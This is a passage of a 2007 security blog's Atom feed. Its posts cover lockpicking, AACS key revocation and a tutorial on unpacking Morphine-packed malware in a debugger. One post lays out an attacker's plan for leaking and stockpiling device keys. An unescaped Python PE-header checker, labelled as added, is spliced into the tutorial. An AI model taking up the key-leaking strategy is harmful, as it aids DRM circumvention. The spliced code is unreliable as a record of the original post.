src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-8484307590900973146</id><published>2007-02-02T23:55:00.000-08:00</published><updated>2007-02-03T00:00:28.832-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='locks'/><title type='text'>Opening cars with a tennis ball</title><content type='html'>Watch this &lt;a href="http://algebraoflife.blogspot.com/2007/02/unlocks-your-car-using-tennis-ball.html"&gt;video&lt;/a&gt; of a woman opening a locked car with a tennis ball. 
Brought to my attention in a &lt;a href="http://digg.com/offbeat_news/Unlocks_Your_Car_Using_A_Tennis_Ball"&gt;Digg post&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Like a lot of people in my business, I do a little lockpicking, though I'm not particularly good at it. I'm curious if anyone knows exactly what is going on in this particular car door lock. I'm curious if the wafers and sidebar are being pressed into place by the air pressure, or if the air is actuating the lock pull linkage, or what.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-8484307590900973146?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/8484307590900973146/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=8484307590900973146' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8484307590900973146'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8484307590900973146'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/02/opening-cars-with-tennis-ball.html' title='Opening cars with a tennis ball'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-8828409584426712074</id><published>2007-02-02T23:38:00.000-08:00</published><updated>2007-02-02T23:43:15.370-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' 
term='secphil'/><title type='text'>MoAB to the BillG</title><content type='html'>You know your &lt;a href="http://applefun.blogspot.com/"&gt;month of bugs&lt;/a&gt; is good when &lt;a href="http://www.msnbc.msn.com/id/16934083/site/newsweek/page/2/"&gt;Bill Gates&lt;/a&gt; is out there &lt;a href="http://ryanlrussell.blogspot.com/2007/01/vulnerability-pimps.html"&gt;pimping&lt;/a&gt; them for you.&lt;br /&gt;&lt;br /&gt;Hey Bill, are you daring people to do a MoVB?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-8828409584426712074?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/8828409584426712074/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=8828409584426712074' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8828409584426712074'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8828409584426712074'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/02/moab-to-billg.html' title='MoAB to the BillG'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-3944529014566731233</id><published>2007-02-01T20:12:00.000-08:00</published><updated>2007-02-01T20:23:09.075-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>Mooninites</title><content 
type='html'>I, for one, am outraged at the ridiculous over-reaction of the Boston authorities to what amounts to a battery-powered litebrite.&lt;br /&gt;&lt;br /&gt;Wait, I can get the bomb squad to come detonate things by attaching LEDs to them?&lt;br /&gt;&lt;br /&gt;I can tie up the entire police force of a major metropolitan city for an entire day with a $100 worth of parts from Radio Shack? Completely distracting them from anything else that might be planned for that day?&lt;br /&gt;&lt;br /&gt;Wait wait... I can get national news coverage on every major news outlet, and get away with it by just not admitting it was me in the first place?&lt;br /&gt;&lt;br /&gt;Carry on.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-3944529014566731233?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/3944529014566731233/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=3944529014566731233' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/3944529014566731233'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/3944529014566731233'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/02/mooninites.html' title='Mooninites'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-785497803073943010</id><published>2007-01-19T21:45:00.000-08:00</published><updated>2007-01-19T22:07:38.800-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>Web of trust</title><content type='html'>I continue to add little bits of other people's Javascript on the side of my blog. I just added some code from &lt;a href="http://technorati.com/"&gt;Technorati&lt;/a&gt;.  Earlier, I added a hit tracker from &lt;a href="http://www.sitemeter.com"&gt;Sitemeter&lt;/a&gt; and am publishing my RSS feed via &lt;a href="http://www.feedburner.com"&gt;Feedburner&lt;/a&gt;. The Technorati and Sitemeter things are raw Javascript includes. Oh, and I've started using &lt;a href="http://zooomr.com"&gt;Zooomr&lt;/a&gt; pictures, more Javascript. I haven't added the dozen "pick me!" buttons from Digg et al, yet. But I'm not ruling it out in the future. I don't plan to turn on the ads, but that's just more of the same.&lt;br /&gt;&lt;br /&gt;The point is, if you want to 0wn my readers, just compromise Blogger, Technorati, Sitemeter, Zooomr or Feedburner. Or maybe something &lt;span style="font-style: italic;"&gt;they&lt;/span&gt; depend on. Then you can hand out all of the browser exploits in my name you want.&lt;br /&gt;&lt;br /&gt;It's not like attacking one site to &lt;a href="http://attrition.org/security/commentary/secfocus.html"&gt;compromise another&lt;/a&gt; has never been done, or that I haven't been &lt;a href="http://www.wired.com/news/culture/0,1284,54400,00.html"&gt;targeted&lt;/a&gt; before. I'm just saying.&lt;br /&gt;&lt;br /&gt;Web 2.0 is looking a lot like a huge interconnected chain of transitive trust. 
See also: &lt;a href="http://myspace.com/"&gt;myspace&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-785497803073943010?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/785497803073943010/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=785497803073943010' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/785497803073943010'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/785497803073943010'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/01/web-of-trust.html' title='Web of trust'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-3882566275680904423</id><published>2007-01-11T13:57:00.000-08:00</published><updated>2007-01-11T19:47:35.258-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='RE'/><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>AACS crack update</title><content type='html'>So I made some bad assumptions in my earlier post about the AACS &lt;a href="http://ryanlrussell.blogspohttp//www2.blogger.com/img/gl.link.gift.com/2007/01/aacs-cracked.html"&gt;crack&lt;/a&gt;. That's what I get for assuming and not hunkering down to read the spec. 
I know more about it now because of today's Freedom to Tinker &lt;a href="http://www.freedom-to-tinker.com/?p=1107"&gt;post&lt;/a&gt; from J. Alex Halderman. He explains: &lt;blockquote&gt;Blacklisting would be a PR and business disaster if it meant a lot of consumers had to throw away their fancy players as a result of a crack. That’s why AACS allows each individual player to be assigned its own unique set of device keys that can be uniquely blacklisted without adversely affecting other players.&lt;br /&gt;&lt;/blockquote&gt;So, the AACS people are smarter than I gave them credit for. If manufacturers  follow recommendations and issue individual keys to each device, then only one person's device is disabled, and there's a good chance that person was involved in leaking the key, so maybe that's appropriate. Further, Halderman says that they only disable new discs with the revocation, and they don't brick the device. Hm, I guess they are nicer than I might be in their situation. ;)&lt;br /&gt;&lt;br /&gt;Halderman refers to the process as "some serious crypto wizardry." Now, I still haven't read the spec, and he has. But I don't see why this should be significantly more complicated than the whole CA/PKI arrangement. The AACS guys probably are a master CA, the licensees are sub-CAs, and they issue a private key/cert pair to each device. When there's a leak, the AACS people can surgically revoke the leaked set.&lt;br /&gt;&lt;br /&gt;Does this change the end game? I don't think so. Halderman talks about some possible things like a title key-issuing oracle. Sounds like too much trouble to me. 
Here's how I think I might do it:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Put in the hard work to find some software or hardware device that I know how to recover the keys from; leak those keys, and only the one set&lt;br /&gt;&lt;/li&gt;&lt;li&gt;At my leisure, stock up as many other keys as I think I'm going to need&lt;/li&gt;&lt;li&gt;Wait for the script kiddies to complain that Star Trek XV won't work with my keys&lt;/li&gt;&lt;li&gt;Leak the next set&lt;/li&gt;&lt;/ul&gt;I could stock up dozens or hundreds of keys, and they are probably good for months at a time. They are good until someone releases a HD DVD that anyone cares about.&lt;br /&gt;&lt;br /&gt;Other potential problems that I foresee popping up:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Maybe I flood the Internet with tons of keys. The revocation list gets large and unwieldy. Maybe discs start to fill up, maybe players take forever to parse through them.&lt;/li&gt;&lt;li&gt;I don't expect the software players to cut a key for every single user, especially if it's like current DVD player software that gets thrown in the box of every Dell computer. They don't want to cut custom CDs, and I assume these keys are all too long to type in from a printed label. On the contrary, the Internet would work fine for some sort of "activation" scheme which gets you a key set right then and there. 
The problem with that is that you now have a website that essentially cuts keys for you at will, and they have their CA private key stored somewhere where it could get stolen.&lt;/li&gt;&lt;li&gt;I don't expect every Taiwanese hardware manufacturer to do what they are supposed to, and they will reuse player keys&lt;/li&gt;&lt;li&gt;Someone could leak or steal a CA keyset&lt;/li&gt;&lt;li&gt;There might be a crypto break like with CSS&lt;/li&gt;&lt;li&gt;And last but not least, how about I keep my keys to myself, and just release the decrypted movies?&lt;/li&gt;&lt;/ul&gt;(And as a disclaimer, I remind people that when I say "I" here, I'm writing from the point of view of a resourceful attacker. As a further disclaimer and future excuse, I still haven't read the AACS spec yet. I guess I need to get on that now.)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-3882566275680904423?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/3882566275680904423/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=3882566275680904423' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/3882566275680904423'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/3882566275680904423'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/01/aacs-crack-update.html' title='AACS crack update'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-7419647959927949005</id><published>2007-01-10T23:42:00.000-08:00</published><updated>2007-01-11T00:10:54.105-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><title type='text'>Testing Zooomr</title><content type='html'>Please stand by, I'm trying to see how Zooomr works with Blogger.&lt;br /&gt;&lt;br /&gt;Here's a picture of part of one of my bookshelves:&lt;br /&gt;&lt;div style="width:240px;text-align:right;"&gt;&lt;a href="http://beta.zooomr.com/photos/ryanlrussell/629116/" title="Zooomr Photo Sharing :: Photo Sharing"&gt;&lt;img src="http://static.zooomr.com/images/629116_006850fa81_m.jpg" width="240" height="180" alt="Bookshelf" border="0" style="border:1px solid #000;" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;OK, looks like Blogger really wants you to limit things to sizes that work with their layout. I guess I'll be sticking to small sizes that you can blow up by clicking on.&lt;br /&gt;&lt;br /&gt;Now, to see why Zooomr doesn't store the original size... 
Ah, OK once you have a Pro account, it looks like you get to keep the original size, too.&lt;br /&gt;&lt;br /&gt;Also, it would be ungenerous of me to not point out that Zooomr is giving away &lt;a href="http://blog.zooomr.com/2006/07/07/do-we-love-bloggers-yes-we-do/"&gt;free Pro accounts&lt;/a&gt; for something as simple as posting a pic like this on your blog.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-7419647959927949005?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/7419647959927949005/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=7419647959927949005' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/7419647959927949005'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/7419647959927949005'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2007/01/testing-zooomr.html' title='Testing Zooomr'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-6541410089045297062</id><published>2007-01-10T21:26:00.000-08:00</published><updated>2007-01-11T21:28:28.920-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='RE'/><category scheme='http://www.blogger.com/atom/ns#' term='spare brain'/><title type='text'>Unpacking I</title><content type='html'>Recently, I was given a 
copy of a piece of malware by Curt Wilson. He had unpacked it in memory, but wasn't quite sure how to finish the process in order to load it up again for further analysis. As a simple howto, and as a way to keep a few notes for myself, I'm documenting the unpacking process.&lt;br /&gt;&lt;br /&gt;The sample in question was found as upnp.exe on disk. Looking at it, it was packed with Morphine. I don't personally consider knowing which packer it is ahead of time to be critical, though there are a couple of exceptions. First, if I know it is &lt;a href="http://upx.sourceforge.net/"&gt;UPX&lt;/a&gt; packed, then I may just try using the latest UPX to unpack it. It works maybe half the time. The other half, there are UPX "corrupters" out there that will break that, and there is at least one packer designed to look somewhat like UPX. Second, there are a couple of packers out there that are probably easily beyond my skill level, and I wouldn't bother trying. The two I can think of off the top of my head are both written by &lt;a href="http://ryanlrussell.blogspot.com/2006/10/nicolas-brulez-analysis-virus.html"&gt;Nicolas Brulez&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;If you want to find out what packer was used, you can usually get an answer from &lt;a href="http://peid.has.it/"&gt;PEiD&lt;/a&gt;, or by trying the &lt;a href="http://www.virustotal.com/en/indexf.html"&gt;VirusTotal&lt;/a&gt; service. &lt;a href="http://www.virustotal.com/vt/en/resultadof?d9da70fbc4a1e1a7c7548dfe68be531d"&gt;Here&lt;/a&gt; is the VirusTotal analysis of upnp.exe, for example. Both of those correctly identify this as Morphine, though I got through the hard part of the unpacking without knowing that.&lt;br /&gt;&lt;br /&gt;The basic unpacking technique is to execute the program with a debugger until the original binary (or as much as is left) is uncompressed in memory, and then you dump the copy in memory. 
Usually, when you dump it you also fix the imports so that your analysis tool will know which functions are being called. I'll show you an example in a moment. For a somewhat more advanced example, you can watch a &lt;a href="http://www.archive.org/details/Recon2005_Ryan_Russell_and_Nicolas_Brulez"&gt;video&lt;/a&gt; where Nicolas does an unpack on a binary that has more than one packer used on it, each with multiple antidebugging tricks. This was from a talk we gave at &lt;a href="http://www.recon.cx/"&gt;RECON&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;First thing, the warnings: If you choose to try to unpack malware, you are taking a chance that you will make a mistake, and just run the thing. If you do this on a real production machine, you will be sad, and infected. If you're smart, you will have a sacrificial machine you can do this on, that you can restore to a known state with no place for the malware to hide. VMware is popular, though unfortunately, a lot of malware now checks to see if it is running in a VM and shuts down.&lt;br /&gt;&lt;br /&gt;The strictest AV guys will also tell you that it is irresponsible to do any analysis on a non-isolated machine, because there's a good chance you will spread it further. If you work on a non-isolated machine and people find out, there's a chance that some or all AV companies will never employ you. That may not seem like much of a threat, but you never know who Symantec or McAfee are going to buy next.&lt;br /&gt;&lt;br /&gt;In other words, do as I say, not as I do. When you press the wrong button in your debugger, and run the malware all the way, you will find yourself &lt;span style="font-weight: bold;"&gt;&lt;span style="font-style: italic;"&gt;very&lt;/span&gt;&lt;/span&gt; interested in finishing the analysis in a hurry in order to find out what you've just done to your machine. 
You should also know which cable to pull in a hurry to disconnect yourself from the Internet.&lt;br /&gt;&lt;br /&gt;So, on with the debugging. Load the program in your favorite debugger. I like to use the debugger now built into &lt;a href="http://datarescue.com/idabase/index.htm"&gt;IDA Pro&lt;/a&gt;. Another popular (and free) debugger is &lt;a href="http://www.ollydbg.de/"&gt;Ollydbg&lt;/a&gt;. With both, you need to set an initial breakpoint, and then run the program. Generally speaking, what you will be doing is stepping through the code until you get to the point where you think you've hit the original packed binary, then you leave it paused.&lt;br /&gt;&lt;br /&gt;This is the easiest place to screw up. For one, in both debuggers, the step, step over, and run keys are all next to each other. If you fat-finger the keypress, you just infected your machine. Also, you may encounter antidebugging tricks. I can't say I noticed any with Morphine, but I have certainly seen them with others. Even if you're single-stepping, if you miss accounting for an antidebugger trick, you may find that the program finishes executing without you.&lt;br /&gt;&lt;br /&gt;One of the things that pretty much all packers do is to replace a certain portion of the OS's loader. For Windows, this almost always means replacing the portion that takes care of loading and mapping the imports. So, if you are tracking through packer code, you will see the packer calling LoadLibrary and GetProcAddress, in a loop. Packers also almost always compress and/or obfuscate the binary code, so there's also going to be some loops where it is iterating over memory segments. These memory segments are usually created by calling VirtualAlloc.&lt;br /&gt;&lt;br /&gt;I bring this up, because you really, really want to step over these functions and not waste time stepping through them or trying to follow them into the kernel. You will also need to become adept at spotting loops. 
You will need to skip those most of the time, just because they will be too tedious to step through manually. Yet another place to screw up.&lt;br /&gt;&lt;br /&gt;Here's an example of something I can spot from experience:&lt;br /&gt;&lt;div style="width: 229px; text-align: right;"&gt;&lt;a href="http://beta.zooomr.com/photos/ryanlrussell/629141/" title="Zooomr Photo Sharing :: Photo Sharing"&gt;&lt;img src="http://static.zooomr.com/images/629141_2d1c87b158_m.jpg" alt="db1" style="border: 1px solid rgb(0, 0, 0);" border="0" height="240" width="229" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;You see where it's pushing a bunch of bytes in the ASCII range onto the stack, and then calling something? Let me decode it to make it a little easier to read:&lt;br /&gt;&lt;br /&gt;&lt;div style="width: 229px; text-align: right;"&gt;&lt;a href="http://beta.zooomr.com/photos/ryanlrussell/629142/" title="Zooomr Photo Sharing :: Photo Sharing"&gt;&lt;img src="http://static.zooomr.com/images/629142_94362c311f_m.jpg" alt="db2" style="border: 1px solid rgb(0, 0, 0);" border="0" height="240" width="229" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Read the function names backwards. This tells me I'm in the beginning stages of restoring the imports. 
Then it calls VirtualAlloc:&lt;br /&gt;&lt;br /&gt;&lt;div style="width: 229px; text-align: right;"&gt;&lt;a href="http://beta.zooomr.com/photos/ryanlrussell/629143/" title="Zooomr Photo Sharing :: Photo Sharing"&gt;&lt;img src="http://static.zooomr.com/images/629143_323c2c9fc4_m.jpg" alt="db3" style="border: 1px solid rgb(0, 0, 0);" border="0" height="240" width="229" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;And you trace through some loops where it is importing all the libraries and fixing up pointers to the functions.&lt;br /&gt;&lt;br /&gt;Eventually, you will arrive at something like this:&lt;br /&gt;&lt;br /&gt;&lt;div style="width: 229px; text-align: right;"&gt;&lt;a href="http://beta.zooomr.com/photos/ryanlrussell/629144/" title="Zooomr Photo Sharing :: Photo Sharing"&gt;&lt;img src="http://static.zooomr.com/images/629144_240e4b6c29_m.jpg" alt="db4" style="border: 1px solid rgb(0, 0, 0);" border="0" height="240" width="229" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;There is often a telltale "JMP EAX" or "CALL EAX", or similar. Step one more instruction, and you're at the Original Entry Point (OEP). This is when you're unpacked, or as much as you're going to be. If you trace much farther, you start initializing things, and you might start causing trouble for your analysis. This is what it looks like when we're at the OEP:&lt;br /&gt;&lt;br /&gt;&lt;div style="width: 229px; text-align: right;"&gt;&lt;a href="http://beta.zooomr.com/photos/ryanlrussell/629145/" title="Zooomr Photo Sharing :: Photo Sharing"&gt;&lt;img src="http://static.zooomr.com/images/629145_428e745576_m.jpg" alt="db5" style="border: 1px solid rgb(0, 0, 0);" border="0" height="240" width="229" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;I usually like to take note of the OEP and the last address before the OEP. I like to set a hardware breakpoint on execute at one or both of those. 
In this case, the OEP isn't mapped to a memory segment until after the program has run some portion of the way through the packer, so I set it on the last address before the OEP, and save the database. That way, if I have trouble with the dump step, I can replay right up to that point without having to manually step it again. That works in this case (Morphine) but not in all cases. Sometimes you have to account for antidebugger tricks along the way.&lt;br /&gt;&lt;br /&gt;Now that you're at the OEP, you need to dump the binary in memory. I've used two tools for this, &lt;a href="http://www.woodmann.com/crackz/Unpackers/Imprec16.zip"&gt;Import Reconstructor&lt;/a&gt; (imprec) and &lt;a href="http://scifi.pages.at/yoda9k/LordPE/info.htm"&gt;LordPE&lt;/a&gt;. Before I get into the technical details on each, I should talk about the reason I ended up putting this post together.&lt;br /&gt;&lt;br /&gt;I was having some trouble getting a good dump of upnp.exe. Specifically, I had traced it to the OEP as I have described, but I couldn't get imprec to dump it properly. The imports table wouldn't come out right. That's when I went to &lt;a href="http://blogs.msdn.com/geffner/default.aspx"&gt;Jason Geffner&lt;/a&gt; for help. Jason is another of these guys who is better at reverse engineering than I am. I met him originally in the class I took from Nicolas Brulez. Jason was taking it too, but he didn't really need it.&lt;br /&gt;&lt;br /&gt;Jason told me to just use LordPE. He said that Morphine ended up rebuilding the original PE file in memory, and that LordPE did a perfect dump. 
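&lt;br /&gt;&lt;br /&gt;Two header fields decide whether a dump like this is usable: AddressOfEntryPoint has to land in a real code section rather than the packer's stub, and the import directory has to be populated, which is the symptom described above for the imprec dump. The following is an added example, not code from the post and not part of LordPE or imprec: a header-only PE32 parser that reports which section holds the entry point, flags an entry point in a last, writable-and-executable section as a packer stub rather than an OEP, and warns when the import directory is empty. The three images it inspects are constructed in the script from header fields alone; the section names (.stub in particular) are placeholders and none of them is upnp.exe.

```python
# Added example: header-only PE32 inspection of a memory dump. All three sample
# images below are constructed from header fields; none is a real binary.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

def le(value, size):
    """Encode an integer as little-endian bytes of the given width."""
    return value.to_bytes(size, "little")

def rd(data, off, size):
    """Read a little-endian unsigned integer of the given width at offset."""
    return int.from_bytes(data[off:off + size], "little")

def has_flag(value, flag):
    """True if the single-bit flag is set in value (integer division keeps the
    example free of bitwise operators; flag must be a power of two)."""
    return (value // flag) % 2 == 1

def build_pe(entry_rva, import_rva, import_size, sections):
    """Emit DOS header, PE signature, COFF header, PE32 optional header and a
    section table. sections: (name, virtual_address, virtual_size, characteristics)."""
    opt = bytearray(224)                 # PE32 optional header: 96 bytes + 16 data directories
    opt[0:2] = le(0x10B, 2)              # Magic = PE32
    opt[16:20] = le(entry_rva, 4)        # AddressOfEntryPoint
    opt[28:32] = le(0x400000, 4)         # ImageBase
    opt[56:60] = le(0x10000, 4)          # SizeOfImage
    opt[92:96] = le(16, 4)               # NumberOfRvaAndSizes
    opt[104:108] = le(import_rva, 4)     # DataDirectory[1] (import table) RVA
    opt[108:112] = le(import_size, 4)    # ... and size
    coff = le(0x14C, 2) + le(len(sections), 2) + bytes(12) + le(len(opt), 2) + le(0x102, 2)
    table = b""
    for name, va, vsize, chars in sections:
        hdr = bytearray(40)
        hdr[0:8] = name.encode("ascii").ljust(8, b"\0")
        hdr[8:12] = le(vsize, 4)         # VirtualSize
        hdr[12:16] = le(va, 4)           # VirtualAddress
        hdr[16:20] = le(vsize, 4)        # SizeOfRawData (a dump keeps raw == virtual)
        hdr[20:24] = le(va, 4)           # PointerToRawData
        hdr[36:40] = le(chars, 4)        # Characteristics
        table += hdr
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    dos[60:64] = le(64, 4)               # e_lfanew: PE header right after the DOS header
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table

def inspect_pe(data):
    """Report which section holds the entry point and whether the import
    directory is populated; warnings list the classic bad-dump symptoms."""
    if data[0:2] != b"MZ":
        raise ValueError("no MZ signature")
    pe = rd(data, 0x3C, 4)
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsec = rd(data, pe + 6, 2)
    opt = pe + 24
    sect = opt + rd(data, pe + 20, 2)    # section table follows the optional header
    entry = rd(data, opt + 16, 4)
    imp_rva, imp_size = rd(data, opt + 104, 4), rd(data, opt + 108, 4)
    report = {"entry_rva": entry, "entry_section": None,
              "import_dir": (imp_rva, imp_size), "warnings": []}
    for i in range(nsec):
        s = sect + 40 * i
        name = data[s:s + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, chars = rd(data, s + 8, 4), rd(data, s + 12, 4), rd(data, s + 36, 4)
        if entry >= va and va + vsize > entry:
            report["entry_section"] = name
            if not has_flag(chars, IMAGE_SCN_MEM_EXECUTE):
                report["warnings"].append("entry point section %s is not executable" % name)
            if i == nsec - 1 and has_flag(chars, IMAGE_SCN_MEM_WRITE) and has_flag(chars, IMAGE_SCN_MEM_EXECUTE):
                report["warnings"].append("entry point is in the last, writable+executable section %s: packer stub, not the OEP" % name)
    if report["entry_section"] is None:
        report["warnings"].append("entry point 0x%X is outside every section" % entry)
    if imp_rva == 0 or imp_size == 0:
        report["warnings"].append("import directory is empty: the import table was not rebuilt")
    return report

# Constructed samples (placeholder section names; not upnp.exe or any real file).
SECTIONS = [
    (".text", 0x1000, 0x3000, 0x60000020),   # CODE | EXECUTE | READ
    (".data", 0x4000, 0x1000, 0xC0000040),   # INITIALIZED_DATA | READ | WRITE
    (".stub", 0x5000, 0x2000, 0xE0000060),   # packer stub: code+data, READ | WRITE | EXECUTE
]
PACKED = build_pe(0x5000, 0x5100, 0x28, SECTIONS)     # packed file on disk: EP in the stub
BAD_DUMP = build_pe(0x1200, 0, 0, SECTIONS)           # dumped at the OEP, imports lost
GOOD_DUMP = build_pe(0x1200, 0x4100, 0x80, SECTIONS)  # dumped at the OEP, imports rebuilt

if __name__ == "__main__":
    for label, image in (("packed", PACKED), ("bad dump", BAD_DUMP), ("good dump", GOOD_DUMP)):
        r = inspect_pe(image)
        print(label, "entry in", r["entry_section"], r["warnings"] or "OK")
```

Run against a real dump, the same checks are the first thing to look at before loading it into a disassembler: an entry point that still sits in the stub section means the trace stopped short of the OEP, and an empty import directory means the dump tool never rebuilt the table, so every call through the IAT will show up as a bare pointer.&lt;br /&gt;&lt;br /&gt;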
